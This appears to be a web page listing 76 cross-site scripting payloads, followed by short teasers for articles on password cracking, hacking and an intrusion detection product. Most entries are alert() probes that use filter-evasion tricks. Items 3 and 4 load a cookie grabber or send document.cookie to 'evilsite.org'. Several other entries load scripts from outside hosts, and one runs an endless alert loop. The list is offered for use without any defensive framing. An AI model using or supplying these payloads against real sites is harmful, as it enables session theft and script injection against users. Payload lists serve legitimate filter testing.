1. <script>alert(1);</script>
  2. <script>alert('XSS');</script>
  3. <script src="http://www.evilsite.org/cookiegrabber.php"></script>
  4. <script>location.href="http://www.evilsite.org/cookiegrabber.php?cookie="+escape(document.cookie)</script>
  5. <scr<script>ipt>alert('XSS');</scr</script>ipt>
  6. <script>alert(String.fromCharCode(88,83,83))</script>
  7. <img src=foo.png onerror=alert(/xssed/) />
  8. <style>@im\port'\ja\vasc\ript:alert(\"XSS\")';</style>
  9. <? echo('<scr)'; echo('ipt>alert(\"XSS\")</script>'); ?>
  10. <marquee><script>alert('XSS')</script></marquee>
  11. <IMG SRC=\"jav&#x09;ascript:alert('XSS');\">
  12. <IMG SRC=\"jav&#x0A;ascript:alert('XSS');\">
  13. <IMG SRC=\"jav&#x0D;ascript:alert('XSS');\">
  14. <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
  15. "><script>alert(0)</script>
  16. <script src=http://yoursite.com/your_files.js></script>
  17. </title><script>alert(/xss/)</script>
  18. </textarea><script>alert(/xss/)</script>
  19. <IMG LOWSRC=\"javascript:alert('XSS')\">
  20. <IMG DYNSRC=\"javascript:alert('XSS')\">
  21. <font style='color:expression(alert(document.cookie))'>
  22. '); alert('XSS
  23. <img src="javascript:alert('XSS')">
  24. <script language="JavaScript">alert('XSS')</script>
  25. [url=javascript:alert('XSS');]click me[/url]
  26. <body onunload="javascript:alert('XSS');">
  27. <body onLoad="alert('XSS');"
  28. [color=red' onmouseover="alert('xss')"]mouse over[/color]
  29. "/></a></><img src=1.gif onerror=alert(1)>
  30. window.alert("Bonjour !");
  31. <div style="x:expression((window.r==1)?'':eval('r=1;
  32. alert(String.fromCharCode(88,83,83));'))">
  33. <iframe<?php echo chr(11)?> onload=alert('XSS')></iframe>
  34. "><script alert(String.fromCharCode(88,83,83))</script>
  35. '>><marquee><h1>XSS</h1></marquee>
  36. '">><script>alert('XSS')</script>
  37. '">><marquee><h1>XSS</h1></marquee>
  38. <META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript:alert('XSS');\">
  39. <META HTTP-EQUIV=\"refresh\" CONTENT=\"0; URL=http://;URL=javascript:alert('XSS');\">
  40. <script>var var = 1; alert(var)</script>
  41. <STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
  42. <?='<SCRIPT>alert("XSS")</SCRIPT>'?>
  43. <IMG SRC='vbscript:msgbox(\"XSS\")'>
  44. " onfocus=alert(document.domain) "> <"
  45. <FRAMESET><FRAME SRC=\"javascript:alert('XSS');\"></FRAMESET>
  46. <STYLE>li {list-style-image: url(\"javascript:alert('XSS')\");}</STYLE><UL><LI>XSS
  47. perl -e 'print \"<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>\";' > out
  48. perl -e 'print \"<IMG SRC=java\0script:alert(\"XSS\")>\";' > out
  49. <br size=\"&{alert('XSS')}\">
  50. <scrscriptipt>alert(1)</scrscriptipt>
  51. </br style=a:expression(alert())>
  52. </script><script>alert(1)</script>
  53. "><BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
  54. [color=red width=expression(alert(123))][color]
  55. <BASE HREF="javascript:alert('XSS');//">
  56. Execute(MsgBox(chr(88)&chr(83)&chr(83)))<
  57. "></iframe><script>alert(123)</script>
  58. <body onLoad="while(true) alert('XSS');">
  59. '"></title><script>alert(1111)</script>
  60. </textarea>'"><script>alert(document.cookie)</script>
  61. '""><script language="JavaScript"> alert('X \nS \nS');</script>
  62. </script></script><<<<script><>>>><<<script>alert(123)</script>
  63. <html><noalert><noscript>(123)</noscript><script>(123)</script>
  64. <INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
  65. '></select><script>alert(123)</script>
  66. '>"><script src = 'http://www.site.com/XSS.js'></script>
  67. }</style><script>a=eval;b=alert;a(b(/XSS/.source));</script>
  68. <SCRIPT>document.write("XSS");</SCRIPT>
  69. a="get";b="URL";c="javascript:";d="alert('xss');";eval(a+b+c+d);
  70. ='><script>alert("xss")</script>
  71. <script+src=">"+src="http://yoursite.com/xss.js?69,69"></script>
  72. <body background=javascript:'"><script>alert(navigator.userAgent)</script>></body>
  73. ">/PlanetCreator/><script>alert(document.cookie)</script><script src="http://www.site.com/XSS.js"></script>
  74. ">/PlanetCreator/><script>alert(document.cookie)</script>
  75. src="http://www.site.com/XSS.js">
  76. data:text/html;charset=utf-7;base64,Ij48L3RpdGxlPjxzY3JpcHQ+YWxlcnQoMTMzNyk8L3NjcmlwdD4=

Explore More

Common Scams

* Password Cracking Password cracking is a common way to retrieve a password by repeatedly trying to guess for the password. The most common method of password cracking is guessing

Hacking

Hacking is an unauthorized access of computers and networks. It is the act of piercing computer systems gaining knowledge of the systems and the learning of how it works. The

What is BlackIce Defender?

BlackIce Defender is a Host-Based Intrusion Detection System (HIDS). It provides a firewall that detects, reports, and blocks all suspected access attempts. When any intrusion is detected, it provides a